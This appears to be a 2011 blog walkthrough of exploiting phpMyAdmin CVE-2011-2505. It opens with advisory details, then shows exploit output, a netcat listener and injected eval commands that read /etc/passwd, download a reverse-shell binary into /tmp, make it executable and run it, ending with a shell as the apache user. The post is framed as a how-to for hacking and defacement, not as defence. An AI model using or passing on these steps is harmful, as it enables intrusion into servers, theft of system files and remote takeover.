Friday, 5 August 2011

phpMyAdmin Prior to and Multiple Remote Vulnerabilities

phpMyAdmin Prior to and Multiple Remote Vulnerabilities
Bugtraq ID: 48563
Class: Input Validation Error
CVE: CVE-2011-2505
Remote: Yes
Local: No
Published: Jul 05 2011 12:00AM
Updated: Jul 26 2011 10:10PM

Hello all, this post will be a mix with an old post that I already did wish was "Deface using EVAL() function" + phpmyadmin Prior to and
PhpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities.Successful attacks can compromise the affected application and possibly the underlying computer. So, lets test that. We have 2 exploits available.With the first one, we will make the eval option available for us to execute remote commands on the target machine.

php exploit1.php
You should get something like this
[i] Running...
[*] Contacting server to retrive session cookie and token.
[i] Cookie:dkucqrelskbq2k8kd2ouive7rsb9t176
[i] Token:64d4cd9570888c981c127bdf47586d65
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.
[*] Contacting server to make it save the injected code to a file.
[*] Contacting server to test if the injected code executes.
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!
[+] Use your browser to execute PHP code like this'test';

Great, that means it worked.
Now we apply what I explained before about EVAL().
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this in the attacking server:
nc -l -p 8080 -vvv

Ok, now lets go back to the browser and upload our shell to the server."ls -la /");"cat /etc/passwd");"wget -P /tmp");"chmod 777 /tmp/airwolf_reverse_shell");"/tmp/airwolf_reverse_shell");

After you typed this last line, you go to the attacking server shell to see if the target server connected to you.
listening on [any] 8080 ... inverse host lookup failed: Unknown server error : Connection timed out
connect to [] from (UNKNOWN) [] 53365

uid=48(apache) gid=48(apache) groups=48(apache)

Yeap, as you can see got our shell in the server.
Have fun ;)